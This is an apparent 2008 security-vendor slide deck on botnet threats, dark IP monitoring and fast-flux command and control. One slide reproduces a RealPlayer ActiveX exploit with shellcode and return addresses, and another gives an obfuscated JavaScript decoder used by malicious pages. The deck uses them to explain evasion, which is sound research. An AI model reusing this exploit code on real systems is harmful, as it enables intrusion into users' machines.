Lit Space Monitoring for Botnets
Stuart Staniford, Chief Scientist
1/21/2008
Botnets = Targeted Infection + Remote Control Payload
Botnet: a collection of compromised PCs (bots) under remote command and control (C&C), used to perpetrate a range of criminal activities
- The remote-control payload enables further malicious payload installs
- Malicious payloads enable monetization via:
  - Spam relay (leased to spammers)
  - DDoS (extortion business model)
  - ID theft (consumer, business, or government)
  - Intellectual property theft
  - Phishing site hosting
  - Click fraud
  - Online financial services fraud
  - E-commerce site fraud
Botnets Are a Critical Threat
"Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007"
"Botnet worm infections can occur even [with] the very latest antivirus signatures and ... OS and application patches."
"Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets" - Vint Cerf
Botnets: A Global Pandemic
Growing Wave of Concern
(Figure: magnitude of threat over time, rising from Nuisance in the late 1990's through Concern and Danger to Beyond as botnet attacks evolve.)
Targets: Consumer, Service Provider, Enterprise, Government
Attacks and impacts charted: DDoS, SPAM, spyware platform, steal resources, mass-scale DDoS, mass-scale SPAM, click fraud, identity theft, phishing, pharming, wide-scale revenue loss, corporate espionage, intellectual property theft, compliance risks, productivity loss, brand damage, resource inefficiency, total enterprise collapse, cyber-terrorism, cyber warfare
Traditional Botnet (first half of the 2000s)
- Grows by active scanning
- Command and control via IRC
Still a Lot of That About
(Figure: portion of a botnet tracked by the FireEye botwall network.)
Monitoring Traditional Botnets
- Dark IP space / network telescope
- Wait for a bot to scan the dark space, and try to capture it
Tradeoffs of Dark IP Monitoring
Advantages:
- Fidelity: if something scans dark IP space, it is likely bad
- Cheap/easy: can cover a lot of IP space that wasn't being used, especially internally to enterprises
Disadvantages:
- Some bots avoid the dark IP space by scanning selectively
- Persuading the bot to talk can be tricky; a deep-interaction honeypot is needed to do it right
- Bots are moving away from scanning as a technique
- Bot owners can learn the dark IPs if there is feedback (e.g. to signatures)
Directions in Botnet Technology
Technology evolution is rapid:
- Well-funded industry
- Smart technologists
- Disciplined execution of attacks and management of resources/business
This gives various trends that render current defensive technologies obsolete:
1. Exploits via web (bypass firewall)
2. Obfuscation and polymorphism (bypass AV/IPS)
3. Distributed command-and-control and high turnover of assets:
   1. renders trackdown and clean-up hard
   2. DNS tracking hard
   3. Web crawling behind the curve
Exploits via Web
Exploit JavaScript for the RealPlayer IERPCtl ActiveX control (the ProgID IERPCtl.IERPCtl.1 is assembled from string fragments), as served by a malicious web page; the version strings it compares against appear blank on the slide, and the snippet starts inside the function body.
if(user.indexOf("nt 5.")==-1)return;
VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";
try{Real=new ActiveXObject(VulObject)}catch(error){return}
RealVersion=Real.PlayerProperty("PRODUCTVERSION");
Padding="";
JmpOver=unescape("%75%06%74%04");
for(i=0;i<32*148;i++)Padding+="S";
if(RealVersion.indexOf(" ")==-1){
  if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");
  else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");
  else return
}
else if(RealVersion==" ")ret=unescape("%63%11%08%60");
else if(RealVersion==" ")ret=unescape("%63%11%04%60");
else if(RealVersion==" ")ret=unescape("%79%31%01%60");
else if(RealVersion==" ")ret=unescape("%79%31%09%60");
else if(RealVersion==" ")ret=unescape("%51%11%70%63");
else return;
if(RealVersion.indexOf(" ")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}
else if(RealVersion.indexOf(" ")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}
else if(RealVersion.indexOf(" ")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}
else if(RealVersion.indexOf(" ")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}
var cuteqqdbug;
AdjESP="LLLL\\XXXXXLD";
var cuteqqdbug2;
cuteqqdbug2=cuteqqdbug;
Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvk"+
"KNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NX"+
"KjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnX"+
"zmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSN"+
"zT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWin"+
"InPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZ"+
"odKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZo"+
"WsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInO"+
"oDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vv"+
"YiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQe"+
"lhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJ"+
"QspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsq"+
"mk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLN"+
"ktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";
PayLoad=Padding+AdjESP+Shell;
while(PayLoad.length<0x8000)PayLoad+="copyleft";
Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}
RealExploit();
More Obfuscated Example
(The body of the decoder loop is truncated on the slide.)
function dc(sed){
l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);
soot=sed;
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam >8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}
dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXbYljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")
Variables and encoding can be polymorphic: the substitution table t, the identifier names and the encoded blob all change from copy to copy, so there is not much for signatures to go on.
Preliminary Experiment on an Open Network (December)
- ~5000 users, ~3 hours of intermittent data
- Parsed HTTP and entities: ~200,000 HTTP-containing flows
- Google Safe Browsing API alerted on ~700 of them
- Manually verified: only 11 checked out
- Daily rate is ~100 incidents/day
  - Don't know how many were successful at this point
  - Not sure how typical this period is, so this is only an order-of-magnitude estimate
- The Google Safe Browsing API alerts were ~98% false positives (11 of ~700 confirmed); reasons not well understood yet
- Gearing up for another experimental run; hopefully a LEET '08 paper
Distributed Command and Control - Storm
- Grows by spam / malicious downloads; has been running for 12 months now in plain sight
- No scanning!
- 115,000 seen from a single .edu vantage point
- eDonkey UDP messages carry the peer-to-peer command and control
Dynamic Infrastructure - Fast-Flux DNS
- Small number of persistent content servers
- Large number of dynamic proxies, rotated through the DNS answers
FireEye, Inc. Confidential
Rendering Current Approaches Obsolete
GAP: a security solution is needed that scales with the exponential nature of the threat
- Antivirus: bypassed by not matching AV signatures
- IDS/IPS: bypassed by not matching signatures and by using other infection vectors
- Network Behavior Analysis: bypassed by low-and-slow spread
- Dark IP Honeypots: bypassed by not targeting dark IP addresses and honeypots
Lit Space Monitoring
Global Deployment
(Diagram: local analysis and protection at each site; global analysis and intelligence distribution across sites.)
Thank you! Q & A